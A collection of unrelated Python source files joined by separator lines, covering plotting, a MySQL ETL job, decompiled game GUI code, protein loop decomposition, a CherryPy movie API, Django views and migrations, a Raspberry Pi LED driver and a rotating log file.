            plt.annotate(S[i], x[:2], size='xx-small', xytext=(6,2), textcoords='offset pixels')
    # Deduplicate legend entries (one per class, not one per polygon).
    handles, labels = plt.gca().get_legend_handles_labels()
    by_label = OrderedDict(zip(labels, handles))
    plt.legend(by_label.values(), by_label.keys())
    plt.xlabel('Principal Component 1')
    plt.ylabel('Principal Component 2')
    plt.title(title)
    plt.gca().set_aspect(aspect_ratio)
    plt.show()
else:
    print('Error: "plot_type" must be either \'2d\', \'3d\' or \'scales\'')
|
import os

import pandas as pd
from sqlalchemy import create_engine
# Connection settings come from the environment so credentials stay out
# of source control.
MYSQL_USER = os.environ["MYSQL_USER"]
MYSQL_PASSWORD = os.environ["MYSQL_PASSWORD"]
MYSQL_HOST = os.environ["MYSQL_HOST"]
MYSQL_DATABASE = os.environ["MYSQL_DATABASE"]
# Fix: the URL previously interpolated the undefined name MYSQL_DB,
# which raised NameError at import time.
mysql_engine = create_engine(f'mysql+pymysql://{MYSQL_USER}:{MYSQL_PASSWORD}@{MYSQL_HOST}/{MYSQL_DATABASE}?charset=utf8', pool_recycle=3600, encoding='utf-8')
mysql_connection = mysql_engine.connect()
##############################################
# Cash-ins
##############################################
def run_cashins_etl():
    """Pull completed COP -> USDv conversions from central_financial and
    materialize them as the `cashins` table (replacing its contents)."""
    query = """
    SELECT `ID`, `User ID`, `Created At`, `Amount Src`, `Amount Dst`
    FROM central_financial
    WHERE `Asset Src` = 'COP' AND `Asset Dst` = 'USDv' AND State = 'COMPLETED' AND Type = 'NORMAL'
    """
    frame = pd.read_sql(query, mysql_connection)
    frame.to_sql("cashins", mysql_connection, if_exists='replace', index=False)
##############################################
# Cash-outs
##############################################
def run_cashouts_etl():
    """Pull completed USDv -> VES conversions from central_financial and
    materialize them as the `cashouts` table (replacing its contents)."""
    query = """
    SELECT `ID`, `User ID`, `Created At`, `Amount Src`, `Amount Dst`
    FROM central_financial
    WHERE `Asset Src` = 'USDv' AND `Asset Dst` = 'VES' AND State = 'COMPLETED' AND Type = 'NORMAL'
    """
    frame = pd.read_sql(query, mysql_connection)
    frame.to_sql("cashouts", mysql_connection, if_exists='replace', index=False)
if __name__ == "__main__":
    # Run both ETL steps when executed as a script.
    run_cashins_etl()
    run_cashouts_etl()
# 2014.10.18 14:41:34 Central European Daylight Time
#Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/profile/ProfileAchievementSection.py
from gui.shared import g_itemsCache
from gui.Scaleform.daapi.view.lobby.profile.ProfileSection import ProfileSection
from gui.Scaleform.daapi.view.meta.ProfileAchievementSectionMeta import ProfileAchievementSectionMeta
from gui.shared.utils.RareAchievementsCache import g_rareAchievesCache, IMAGE_TYPE
class ProfileAchievementSection(ProfileSection, ProfileAchievementSectionMeta):
    """Profile tab showing achievements; re-renders itself whenever the
    rare-achievements cache delivers late-arriving text or images."""
    def __init__(self, *args):
        ProfileAchievementSectionMeta.__init__(self)
        ProfileSection.__init__(self, *args)
        # Subscribe to async asset delivery from the rare-achievements cache.
        g_rareAchievesCache.onTextReceived += self._onRareTextReceived
        g_rareAchievesCache.onImageReceived += self._onRareImageReceived
    def request(self, data):
        # `data` identifies the account; prefetch its rare achievements.
        dossier = g_itemsCache.items.getAccountDossier(data)
        if dossier is not None:
            g_rareAchievesCache.request(dossier.getBlock('rareAchievements'))
    def _onRareTextReceived(self, *args):
        self.invokeUpdate()
    def _onRareImageReceived(self, imgType, rareID, imageData):
        # Only react to the 67x71 icon size used by this view.
        if imgType == IMAGE_TYPE.IT_67X71:
            self.invokeUpdate()
    def _disposeRequester(self):
        # Unsubscribe in reverse order of subscription.
        g_rareAchievesCache.onImageReceived -= self._onRareImageReceived
        g_rareAchievesCache.onTextReceived -= self._onRareTextReceived
# +++ okay decompiling res/scripts/client/gui/scaleform/daapi/view/lobby/profile/profileachievementsection.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2014.10.18 14:41:34 Central European Daylight Time
|
from selenium.webdriver.remote.webdriver import WebDriver
from homework_zfh.test_frame.handle_black import handle_black
class BasePage:
    """Common base for page objects: wraps element lookup, clicking and
    text entry around a shared WebDriver instance."""

    def __init__(self, driver: WebDriver = None):
        self.driver = driver

    @handle_black
    def find(self, locator):
        """Locate a single element; the decorator retries past known
        pop-up/overlay interference."""
        return self.driver.find_element(*locator)

    def find_and_click(self, locator):
        """Locate the element and click it."""
        element = self.find(locator)
        element.click()

    def send(self, locator, content):
        """Locate the element and type *content* into it."""
        target = self.find(locator)
        target.send_keys(content)
|
#####################################################################################################################################################################
#
# Grzegorz M Koczyk (2007-)
#
# Decomposition of protein structures into loops
#
#####################################################################################################################################################################
from __future__ import with_statement
import sys, os, os.path
from dhcl.utils import *
from dhcl.pdb_data import *
from collections import defaultdict
DEBUG = 0
######################################################################################################################################################################
# FUNCTIONS - parsing data
@handlify(is_method=False, mode='r')
def readAtomDistsForResidues(fh, triple2seqno):
    ''' Utility function to read in residue contact distances data outputted by contacts program.

    Returns result[chain1][seqno1][chain2][seqno2] -> StructObject holding
    the minimum contact distance (r) and a contact count for the residue
    pair. triple2seqno maps chain -> (resno, icode) -> sequential number.
    '''
    result = defaultdict( innerDefaultdict( innerDefaultdict( dict ) ) )
    for line in fh:
        if line:
            atomno1, resno1, icode1, resname1, chain1, atomname1, atomno2, resno2, icode2, resname2, chain2, atomname2, r = line.strip('\n').split('\t')
            resno1, resno2 = int(resno1), int(resno2)
            seqno1, seqno2 = triple2seqno[chain1][(resno1, icode1)], triple2seqno[chain2][(resno2, icode2)]
            r = float(r)
            r1 = result[chain1][seqno1][chain2]
            r2 = result[chain2][seqno2][chain1]
            # NOTE(review): this membership test keys r1 by resno2 while
            # entries are stored under seqno2 — looks like a seqno/resno
            # mix-up; confirm against the contacts-file numbering.
            if resno2 in r1:
                r1[resno2].no_contacts +=1
                r_old = r1[resno2].r
                r1[resno2].r = min( [r, r_old] )
            else:
                # Store symmetrically: both directions share one object.
                result[chain2][seqno2][chain1][seqno1] = result[chain1][seqno1][chain2][seqno2] = StructObject( resname1=resname1, resname2=resname2, r=r, no_contacts=1 )
    return result
# Loop length limits (residues) and closure-distance thresholds
# (Angstroms) for the decomposition sweep.
MIN_LOOP_LEN = 15
MAX_LOOP_LEN = 45
MIN_INIT_DISTANCE = 2.5
MAX_INIT_DISTANCE = 5.0
DISTANCE_STEP = 1.0
MAX_FINAL_DISTANCE = 12.0
# Max gap length for stopping criterion
MAX_GAP_LEN = 10
class Loop(object):
    ''' Object representing a loop: a chain segment [resno1, resno2]
    closed at the given contact distance. '''
    def __init__(self,resno1, resno2, distance, chain=' ', bounds=None):
        # Normalize so that resno1 <= resno2.
        self.resno1, self.resno2 = (resno1,resno2) if resno2>resno1 else (resno2,resno1)
        if bounds is not None:
            # bounds maps chain -> seqno -> (resno, icode); keep this chain's map.
            self.bc = bounds[chain]
        else:
            self.bc = None
        self.distance = distance
        self.chain = chain
        # Flag used by loopDecompose to mark loops superseded by smaller ones.
        self.use = True
    # Alternative accessors for first and last residue numbers
    def getBegin(self):
        return self.resno1
    begin = property(getBegin)
    def getEnd(self):
        return self.resno2
    end = property(getEnd)
    def encompasses(self, other):
        ''' Whether a loop encompasses another loop '''
        if self.chain!=other.chain:
            return False
        else:
            return (self.resno1<=other.resno1 and self.resno2>=other.resno2)
    def crosses(self, other):
        ''' Whether a loop overlaps with another loop; returns the number
        of shared residues (0 when disjoint or on different chains). '''
        if self.chain!=other.chain:
            return 0
        else:
            d = min([self.resno2, other.resno2]) - max([self.resno1, other.resno1])+1
            if d>0:
                return d
            else:
                return 0
    def __str__(self):
        # Prefer original PDB numbering when bounds were supplied.
        if self.bc:
            beginr, begini = self.bc[self.begin]
            begin = "%s%s" % (beginr, begini.strip())
            endr, endi = self.bc[self.end]
            end = "%s%s" % (endr, endi.strip())
        # Otherwise use our numbering
        else:
            begin = self.begin
            end = self.end
        return "(%s:%s>%s:%s=%s)" % (begin, self.chain, end, self.chain, self.distance)
    def __len__(self):
        return self.resno2-self.resno1+1
    def getSize(self):
        return self.resno2-self.resno1+1
    size = property(getSize)
    @classmethod
    def parseString(klass, s, seqno2triple=None, triple2seqno=None):
        ''' Parse a string encoding this loop (see __str__ method for the input pattern).
        Yields one Loop per '/'-separated element. '''
        s = s.replace(' ', '')
        if len(s):
            loop_strs = s.split('/')
            for lstr in loop_strs:
                # Strip the surrounding parentheses, then split off the distance.
                lstr = lstr[1:-1]
                bstr, tstr = lstr.split('=')
                distance = float(tstr)
                b1str, b2str = bstr.split('>')
                begin, chain = b1str.split(':')
                end, chain = b2str.split(':')
                chain = chain if chain else ' '
                if triple2seqno:
                    # Translate PDB numbering back to sequential numbering.
                    begin, end = triple2seqno[chain][parseResidueId(begin)], triple2seqno[chain][parseResidueId(end)]
                else:
                    pass
                yield klass(begin, end, distance, chain, seqno2triple)
    __repr__ = __str__
def decomposeStep(rdists, seqno2triple, r_min, r_max, no_len_bounds=False):
    ''' Decompose into loops at given (r_min, r_max) radius thresholds.

    Yields a Loop for every same-chain residue pair whose minimum contact
    distance lies within [r_min, r_max]; unless no_len_bounds is set the
    pair must also span MIN_LOOP_LEN..MAX_LOOP_LEN residues.
    '''
    for chain in seqno2triple:
        bchain = sorted(seqno2triple[chain])
        for i, resno1 in enumerate(bchain):
            r_ = rdists[chain][resno1][chain]
            for resno2 in bchain[i+1:]:
                if resno2 in r_ and (no_len_bounds or MIN_LOOP_LEN <= (resno2-resno1+1) and (resno2-resno1+1) <= MAX_LOOP_LEN):
                    r_dist = r_[resno2].r
                    # (the second `resno2 in r_` test is redundant but harmless)
                    if resno2 in r_ and (r_min <= r_dist) and ( r_dist <= r_max):
                        yield Loop(resno1, resno2, r_dist, chain, seqno2triple)
def curateSingle(loops):
    ''' Curate a single set of loops, so that only the non-overlapping
    tightest ones remain: loops are ranked by closure distance and each
    survivor suppresses looser loops overlapping it by >5 residues. '''
    ordered = sorted(loops, key=lambda loop: loop.distance)
    survivors = [True] * len(ordered)
    for i, tight in enumerate(ordered):
        if not survivors[i]:
            continue
        for offset, rival in enumerate(ordered[i+1:]):
            if tight.crosses(rival) > 5:
                survivors[i + offset + 1] = False
    return [loop for i, loop in enumerate(ordered) if survivors[i]]
def curateByOld(loops, old_loops):
    ''' Curate a single set of loops by another set of loops: every old
    loop is yielded first, then each new loop that does not overlap any
    old one by more than 5 residues. '''
    for established in old_loops:
        yield established
    for candidate in loops:
        blocked = any(candidate.crosses(established) > 5
                      for established in old_loops)
        if not blocked:
            yield candidate
class Block(list):
    # A run of overlapping large loops; loopDecompose annotates instances
    # with .begin/.end residue bounds.
    pass
def loopDecompose(rdists, seqno2triple):
    ''' Decompose chains into loops; returns a dict chain -> list of Loop.

    Strategy: enumerate candidate loops over the widest distance window,
    keep the tightest non-overlapping ones, break blocks of very large
    loops into smaller ones where possible, then try to extend the
    terminal loops at both chain ends.
    '''
    # Start with MIN_INIT_DISTANCE, MAX_FINAL_DISTANCE decomposition
    # Find the loops and reconstruct initial coverage
    whole_loops = list( decomposeStep(rdists, seqno2triple, MIN_INIT_DISTANCE, MAX_FINAL_DISTANCE) )
    if DEBUG:
        print "Whole", whole_loops
    loops = list( curateSingle(whole_loops) )
    if DEBUG:
        print loops
    # Partition loops by chain
    lbcs = defaultdict(list)
    for chain in seqno2triple:
        lbcs[chain] = list()
    for l in loops:
        lbcs[l.chain].append(l)
    # Also create smaller loops and partition them by chain
    smcs = defaultdict(list)
    for l in decomposeStep(rdists, seqno2triple, 4., 5.):
        if len(l)<30:
            smcs[l.chain].append(l)
    # For each chain
    for chain in lbcs:
        cloops = lbcs[chain] = sorted(lbcs[chain], key=lambda l: l.resno1)
        smaller_loops = sorted(smcs[chain], key=lambda l: l.distance)
        #####################################################################
        # Find blocks of large loops (>40AA)
        blocks = []
        block = Block()
        block.begin = block.end = min(seqno2triple[chain])
        new_cloops = []
        for l in cloops:
            if len(l)>=39:
                # Grow the current block to cover this large loop.
                if block.begin > l.resno1:
                    block.begin = l.resno1
                if block.end < l.resno2:
                    block.end = l.resno2
                block.append(l)
            else:
                # A small loop terminates the current block (if any).
                if block:
                    if block.end < l.resno1:
                        block.end = l.resno1
                    blocks.append(block)
                    block = Block()
                    block.begin = l.resno2
                    block.end = l.resno2
                # This loop is saved for future (it is not part of a block to decompose)
                new_cloops.append(l)
        if block:
            block.end = max(seqno2triple[chain])
            blocks.append(block)
        if DEBUG:
            print blocks
            print smaller_loops
        ########################################################################
        # For each block of large loops - try to decompose it into sets of smaller ones
        for block in blocks:
            nsloops = list( curateSingle( l for l in smaller_loops if l.resno1>=block.begin and l.resno2<=block.end ) )
            if DEBUG:
                print "Decompose"
                print block, block.begin, block.end
                print nsloops
            old_but_used = []
            if len(nsloops)>0:
                for l in block:
                    append = True
                    for nl in nsloops:
                        if nl.crosses(l)>5:
                            append=False
                            break
                    # Keep old loops if they are the only solution (no significant crosses between new ones and old one) :)
                    if append:
                        old_but_used.append(l)
                # Mark replacements so end-curation skips them later.
                for l in nsloops:
                    l.use = False
                new_cloops.extend(nsloops+old_but_used)
            else:
                new_cloops.extend(block)
        if DEBUG:
            print new_cloops
        ########################################################################
        # Curate ends
        #lbcs[chain] = new_cloops
        cloops = sorted(new_cloops, key=lambda l: l.resno1)
        if len(cloops)>1:
            # Curate N end - try to extend the original loop keeping to within 115% of tightness
            loop = cloops[0]
            if loop.use and len(loop)<20:
                begin = min(seqno2triple[chain])
                if len(cloops)>1:
                    if cloops[1].resno1 > loop.resno2:
                        end = cloops[1].resno1
                    else:
                        end = loop.resno2
                else:
                    end = max(seqno2triple[chain])
                cands = sorted( [ l for l in whole_loops if l.resno1>=begin and l.resno2<=end and l.distance<=loop.distance*1.15 and l.chain==chain],
                                key=lambda l: len(l), reverse=True )
                cloops[0] = cands[0]
            # Curate C end - try to extend the original loop keeping to within 115% of tightness
            loop = cloops[-1]
            if loop.use and len(loop)<20:
                end = max(seqno2triple[chain])
                if len(cloops)>1:
                    if cloops[-2].resno2 < loop.resno1:
                        begin = cloops[-2].resno2
                    else:
                        begin = loop.resno1
                else:
                    begin = min(seqno2triple[chain])
                cands = sorted( [ l for l in whole_loops if l.resno1>=begin and l.resno2<=end and l.distance<=loop.distance*1.15 and l.chain==chain],
                                key=lambda l: len(l), reverse=True )
                cloops[-1] = cands[0]
        lbcs[chain] = cloops
    ############################################################################
    # Results are returned by chain
    return lbcs
def prepareLoops(calpha_cs_fname, bounds_fname):
    ''' Prepares domains for chains on basis of the files. WARNING: returns Python data structure, not filename '''
    # The bounds file yields both directions of the residue-numbering map.
    seqno2triple, triple2seqno = readChainBounds(bounds_fname)
    return loopDecompose( readAtomDistsForResidues(calpha_cs_fname, triple2seqno), seqno2triple )
# INPUT / OUTPUT OF LOOPS
import csv
@handlify(mode='w')
def writeLoopsTsv(fh, loops, uid=None):
    ''' Write loops into TSV format. Optionally give the unique PDB identifier (first column in the TSV file).'''
    writer = csv.writer(fh, dialect='excel-tab')
    for chain in sorted(loops):
        encoded = '/'.join(str(loop) for loop in loops[chain])
        writer.writerow([uid, chain, encoded])
@handlify(mode='r')
def readLoopsTsv(fh, seqno2triple=None, triple2seqno=None):
    ''' Read loops in tab-separated format into a dictionary indexed by PDB of loop dictionaries indexed by chains.'''
    reader = csv.reader(fh, dialect='excel-tab')
    result = defaultdict( dict )
    for row in reader:
        uid, chain, encoded = row[0], row[1], row[2]
        result[uid][chain] = list(Loop.parseString(encoded, seqno2triple, triple2seqno))
    return result
|
#John F. Lake, Jr.
#This is the handler for /movies/, /movies/{movieID}, /reset/, and /reset/{movieID}
import cherrypy
from _movie_database import _movie_database
import json
class Movies(object):
    """CherryPy REST handler for /movies/, /movies/{movieID}, /reset/ and
    /reset/{movieID}. Wraps a movie database object and speaks JSON;
    write operations are gated on a shared API key in the request body.

    NOTE(review): json.dumps(..., encoding='latin-1') is Python-2-only;
    confirm before any Python 3 migration.
    """
    # NOTE(review): this decorator syntactically applies to __init__,
    # which never parses a request body — presumably intended for the
    # handler methods; confirm.
    @cherrypy.tools.json_in()
    #Load in all of the data.
    def __init__(self,DB):
        self.API_KEY = 'AAAAAAAB'
        self.myDB = DB
        # Fresh start: clear ratings, then load the MovieLens 1M data.
        self.myDB.delete_all_ratings()
        self.myDB.load_movies('ml-1m/movies.dat')
        self.myDB.load_users('ml-1m/users.dat')
        self.myDB.load_ratings('ml-1m/ratings.dat')
        self.myDB.load_posters('ml-1m/images.dat')
    #GET for /movies/{movieID}; returns the info about that movie
    def GET(self,id=None):
        output = {'result':'success'}
        mov = self.myDB.get_movie(id)
        if mov is None:
            output['result'] = 'error'
            output['message'] = 'key not found'
        else:
            # mov is a (title, genres) pair.
            output['id'] = id
            output['genres'] = mov[1]
            output['title'] = mov[0]
            output['img'] = self.myDB.get_poster_by_id(id)
        return json.dumps(output,encoding = 'latin-1')
    #PUT for /movies/{movieID}; changes that movie
    def PUT(self,id=None):
        output = {'result':'success'}
        v = json.loads(cherrypy.request.body.read())
        if v['apikey'] == self.API_KEY:
            info = []
            info.append(v['title'])
            info.append(v['genres'])
            self.myDB.set_movie(id,info)
        else:
            output['result'] = 'failure'
        return json.dumps(output,encoding = 'latin-1')
    #GET for /movies/; returns info about all of the movies
    def GET_ALL(self):
        output = {'result':'success'}
        output['movies'] = []
        for key in self.myDB.get_movies():
            mov = self.myDB.get_movie(key)
            if mov is not None:
                info = {}
                info['id'] = int(key)
                info['genres'] = mov[1]
                info['title'] = mov[0]
                info['img'] = self.myDB.get_poster_by_id(key)
                output['movies'].append(info)
        return json.dumps(output,encoding = 'latin-1')
    #POST for /movies/; adds a movie
    def POST(self):
        output = {'result':'success'}
        v = json.loads(cherrypy.request.body.read())
        if v['apikey'] == self.API_KEY:
            info = []
            info.append(v['title'])
            info.append(v['genres'])
            # Echo back the id the database assigned.
            id = self.myDB.add_movie(info)
            output['id'] = id
        else:
            output['result'] = 'failure'
        return json.dumps(output,encoding = 'latin-1')
    #DELETE for /movies/{movieID}; deletes that movie
    def DELETE(self,id):
        v = json.loads(cherrypy.request.body.fp.read())
        output = {'result':'success'}
        if v['apikey'] == self.API_KEY:
            self.myDB.delete_movie(id)
        else:
            output['result'] = 'failure'
        return json.dumps(output,encoding = 'latin-1')
    #DELETE for /movies/; deletes all of the movies
    def DELETE_ALL(self):
        output = {'result':'success'}
        v = json.loads(cherrypy.request.body.fp.read())
        keys = self.myDB.get_movies()
        if v['apikey'] == self.API_KEY:
            for key in keys:
                self.myDB.delete_movie(key)
        else:
            output['result'] = 'failure'
        return json.dumps(output,encoding = 'latin-1')
    #PUT for /reset/{movieID}; Resets that movie
    def RESET(self,id):
        v = json.loads(cherrypy.request.body.fp.read())
        output = {'result':'success'}
        if v['apikey'] == self.API_KEY:
            # Reload just this movie's row from the source data file.
            self.myDB.load_movie(id,'ml-1m/movies.dat')
        else:
            output['result'] = 'failure'
        return json.dumps(output,encoding = 'latin-1')
    #PUT for /reset/; resets all of the data
    def RESET_ALL(self):
        v = json.loads(cherrypy.request.body.fp.read())
        output = {'result':'success'}
        if v['apikey'] == self.API_KEY:
            # Re-initialize the database and reload everything from disk.
            self.myDB.__init__()
            self.myDB.load_movies('ml-1m/movies.dat')
            self.myDB.load_users('ml-1m/users.dat')
            self.myDB.load_ratings('ml-1m/ratings.dat')
            self.myDB.load_posters('ml-1m/images.dat')
        else:
            output['result'] = 'failure'
        return json.dumps(output,encoding = 'latin-1')
|
'''
Write a pseudo-code to move from the start (S) to the end (E) in the maze.
Note: You can drag and drop the pseudo-code magnets to the pseudo-code box and create the appropriate pseudo-code.
'''
while(start!=end) do
    if(Is_Next_Block_Bomb) then
        move Down
        move Down
    else
        move Right
    end-if
end-while
|
import random
from cimensa.models import Words
class Homegame:
    """View-model for the words game: fetches six random words and marks
    one slot (1-6) as the correct answer."""

    def __init__(self):
        self.page_title = 'Games'
        # Let MySQL pick six random rows; RAND() ordering is acceptable
        # at this table size.
        words = Words.objects.raw("SELECT id, word, part_of_speech, definition FROM cimensa_words ORDER BY RAND() LIMIT 6")
        # randint is the idiomatic (and distribution-equivalent) way to
        # draw an integer in 1..6.
        self.correct = random.randint(1, 6)
        self.words = words
|
from django.urls import path
from . import views
# Route the app root to the index view.
urlpatterns = [
    path('', views.index, name='aug_c'),
]
import json
from django import forms
from django.apps import apps
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http.response import HttpResponse, HttpResponseBadRequest
from django.shortcuts import render, get_object_or_404
from django.core.urlresolvers import reverse
from django.views import generic
# Resolve ddm_core models via the app registry (avoids direct imports).
Criterion = apps.get_model('ddm_core', 'Criterion')
Option = apps.get_model('ddm_core', 'Option')
Score = apps.get_model('ddm_core', 'Score')
Category = apps.get_model('ddm_core', 'Category')
def get_score(criterion, option, user):
    """Return the user's Score for (criterion, option), or None when the
    user has not scored that combination yet."""
    try:
        return Score.objects.get(
            user=user,
            option=option,
            criterion=criterion,
        )
    except Score.DoesNotExist:
        return None
class ListView(LoginRequiredMixin, generic.ListView):
    """Show every category's criteria alongside the current user's
    scores for a single option."""
    template_name = 'scoring/list.html'
    model = Category
    context_object_name = 'category_scores'

    def get(self, request, *args, **kwargs):
        # Resolve the option up front so get_queryset/context can use it.
        self.option = get_object_or_404(Option, uuid=self.kwargs['option_uuid'])
        return super(ListView, self).get(request, *args, **kwargs)

    def get_queryset(self):
        # Build [(Category, [(Criterion, Score-or-None), ...]), ...]
        return [
            (
                category,
                [(criterion, get_score(criterion, self.option, self.request.user))
                 for criterion in category.criteria.all()],
            )
            for category in super(ListView, self).get_queryset()
        ]

    def get_context_data(self, **kwargs):
        context = super(ListView, self).get_context_data(**kwargs)
        context.update(option=self.option)
        return context
class ScoreForm(forms.ModelForm):
    """Form for a single Score value; submitting an empty value deletes
    an existing score instead of saving one."""
    value = forms.IntegerField(required=False)
    class Meta:
        fields = ['value']
        model = Score
    def save(self, commit=True):
        """Save the score, or delete the existing one when no value was given.

        Bug fix: the ``commit`` flag is now forwarded to ``ModelForm.save``
        (it used to be silently ignored), and the saved instance is returned
        as callers of a ModelForm expect.
        """
        if self.cleaned_data.get('value') is not None:
            return super(ScoreForm, self).save(commit)
        # No value submitted: remove a previously stored score, if any.
        if self.instance and self.instance.pk:
            self.instance.delete()
class SetView(LoginRequiredMixin, generic.CreateView):
    """Create or update the current user's Score for one (option, criterion),
    answering plain 'OK'/'400' for AJAX calls and redirecting otherwise."""
    model = Score
    form_class = ScoreForm
    def get_form_kwargs(self):
        # Resolve both URL objects; 404 on unknown uuids.
        self.option = get_object_or_404(Option, uuid=self.kwargs.get('option_uuid'))
        self.criterion = get_object_or_404(Criterion, uuid=self.kwargs.get('criterion_uuid'))
        score = get_score(self.criterion, self.option, self.request.user)
        # If the score already exists for this user/criterion, then update the
        # instance of it rather than creating a new one
        if score:
            self.object = score
        return super(SetView, self).get_form_kwargs()
    def form_valid(self, form):
        # Only stamp ownership on brand-new scores; updates keep theirs.
        if not form.instance.id:
            form.instance.option = self.option
            form.instance.criterion = self.criterion
            form.instance.user = self.request.user
        # NOTE(review): request.is_ajax() is removed in modern Django —
        # fine for the Django version this file targets, confirm on upgrade.
        if self.request.is_ajax():
            form.save()
            return HttpResponse('OK')
        else:
            return super(SetView, self).form_valid(form)
    def form_invalid(self, form):
        if self.request.is_ajax():
            return HttpResponseBadRequest(json.dumps(form.errors))
        else:
            return super(SetView, self).form_invalid(form)
    def get_success_url(self):
        # Back to the scoring list for the same option.
        return reverse('scoring:list', args=(self.option.uuid,))
|
"""
LED
Author: Robert Ross
Outputs data to the led on the indicated pin
"""
import RPi.GPIO as GPIO
class LED:
    """
    Handles the control of an LED on a single GPIO pin.
    """

    # PWM carrier frequency (Hz) used for dimming.
    PWM_FREQUENCY = 100

    def __init__(self, dataPin=4):
        """
        Create the object to talk to the LED
        Keyword arguments:
        dataPin - the pin that is used to talk to the led
        """
        self.dataPin = dataPin
        self._pwm = None  # active PWM driver, if dimming is in use
        if GPIO.getmode() == -1:
            GPIO.setmode(GPIO.BCM)
        GPIO.setup(self.dataPin, GPIO.OUT)

    def _stop_pwm(self):
        """Release any active PWM driver so plain on/off works cleanly."""
        if self._pwm is not None:
            self._pwm.stop()
            self._pwm = None

    def on(self):
        """Turn on the LED"""
        self._stop_pwm()
        GPIO.output(self.dataPin, True)

    def off(self):
        """Turn off the LED"""
        self._stop_pwm()
        GPIO.output(self.dataPin, False)

    def onPercent(self, percentage):
        """Turn on the LED a percentage through PWM.

        Bug fix: ``GPIO.PWM(pin, x)`` only constructs a PWM object — its
        second argument is the frequency, not a duty cycle — and the object
        was immediately discarded, so the LED never changed. We now keep the
        PWM instance alive and drive its duty cycle.
        """
        if self._pwm is None:
            self._pwm = GPIO.PWM(self.dataPin, self.PWM_FREQUENCY)
            self._pwm.start(percentage)
        else:
            self._pwm.ChangeDutyCycle(percentage)

    def offPercent(self, percentage):
        """Turn off the LED a percentage through PWM"""
        self.onPercent(100.0 - percentage)
|
import itertools

INDEX = 1000000


def nth_permutation(index=INDEX, digits=range(10)):
    """Return the *index*-th (1-based) lexicographic permutation of *digits*
    as a string.

    itertools.permutations over a sorted input already yields permutations in
    lexicographic order, so we stream to the target instead of materializing
    and sorting all of them (the original built a 3.6M-element list).
    """
    perm = next(itertools.islice(itertools.permutations(sorted(digits)), index - 1, None))
    return ''.join(map(str, perm))


# Python-2-only `print expr` replaced with the form valid on both 2 and 3.
print(nth_permutation())
|
# -*- coding: utf-8 -*-
"""A daily rotating file."""
from threading import Lock
from time import localtime
from time import mktime
from time import strftime
from time import time
class RotatorInfo:
    """Tracks the dated filename of a daily-rotating file."""

    def __init__(self, base, format='.%y%m%d'):
        self._base = base
        self._format = format
        self._setup()

    def toSwitch(self):
        """true, when we should switch filename."""
        return time() > self._limit

    def getFilename(self):
        """the current filename."""
        if self.toSwitch():
            self._setup()
        return self._filename

    def _setup(self, _t=(0, 0, 0)):
        # Today's date with the time-of-day fields zeroed out ...
        now = localtime(time())
        midnight = now[:3] + _t + now[6:]
        # ... the switch limit is the start of the NEXT day ...
        self._limit = mktime(midnight[:2] + (midnight[2] + 1, ) + midnight[3:])
        # ... and the filename carries today's date suffix.
        self._filename = self._base + strftime(self._format, midnight)
class Rotator(RotatorInfo):
    """A rotating, writable, file-like object.

    Appends to ``base + strftime(format)`` and transparently re-opens a
    fresh file once the day rolls over.
    """

    def __init__(self, base, format='.%y%m%d', lock=0):
        """
        base   -- filename prefix
        format -- strftime suffix appended to *base*
        lock   -- when truthy, serialize writes with a threading.Lock
        """
        RotatorInfo.__init__(self, base, format)
        self._file = None
        self._lock = lock and Lock()
        self._open()

    def write(self, str):
        """write *str* and flush, rotating to a new file first if due."""
        lock = self._lock
        if lock:
            lock.acquire()
        try:
            if self.toSwitch():
                self._open()
            f = self._file
            f.write(str)
            f.flush()
        finally:
            if lock:
                lock.release()

    def flush(self):
        """helper to support applications that want to flush themselves."""
        pass

    def close(self):
        """Close the underlying file; further writes are invalid."""
        if self._file is not None:
            self._file.close()
            self._file = None

    def _open(self):
        # Bug fix: close the previous day's file before opening the new one;
        # the old handle used to leak on every rotation.
        if self._file is not None:
            self._file.close()
        self._file = open(self.getFilename(), "a")  # ATT: developped for Unix
|
# Generated by Django 2.0 on 2021-05-11 09:13
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated schema migration (Django 2.0): introduces the
    # Application model (a trade request linking a buyer/seller pair and
    # their two barter items) and tweaks the Barter model's options and
    # image field. Generated code — do not hand-edit except to squash.
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('barter', '0004_auto_20210418_1533'),
    ]
    operations = [
        migrations.CreateModel(
            name='Application',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('status', models.SmallIntegerField(choices=[(0, '待查阅'), (1, '失败'), (2, '成功')], default=0, verbose_name='状态')),
                ('isDelete', models.BooleanField(default=False, verbose_name='是否删除')),
            ],
            options={
                'verbose_name': '交易记录表',
                'verbose_name_plural': '交易记录表',
            },
        ),
        migrations.AlterModelOptions(
            name='barter',
            options={'ordering': ['-created_time'], 'verbose_name': '换品', 'verbose_name_plural': '换品'},
        ),
        migrations.AlterField(
            model_name='barter',
            name='image',
            field=models.ImageField(blank=True, null=True, upload_to='barter/%Y%m%d/', verbose_name='换品图片'),
        ),
        migrations.AddField(
            model_name='application',
            name='buy_barter',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='buy_barter', to='barter.Barter'),
        ),
        migrations.AddField(
            model_name='application',
            name='buyer',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='buyer', to=settings.AUTH_USER_MODEL, verbose_name='买家'),
        ),
        migrations.AddField(
            model_name='application',
            name='sell_barter',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sell_barter', to='barter.Barter'),
        ),
        migrations.AddField(
            model_name='application',
            name='seller',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='seller', to=settings.AUTH_USER_MODEL, verbose_name='卖家'),
        ),
    ]
|
from django.contrib import admin
from .models import Product, userProducts, UserProfile
# creating a list for the admin page view
@admin.register(UserProfile)
class UserProfileAdmin(admin.ModelAdmin):
    """Admin list view for user profiles."""
    # Renamed from ``UserProfile``: the old class name shadowed the imported
    # ``UserProfile`` model for the rest of this module.
    list_display = ("user", "first_name", "last_name", "phone_number")
@admin.register(Product)
class ProductAdmin(admin.ModelAdmin):
    """Admin list view for products."""
    list_display = ("product_name", "product_type", "product_price")
@admin.register(userProducts)
class userProductsAdmin(admin.ModelAdmin):
    # Registered with default admin behaviour; no list customisation yet.
    pass
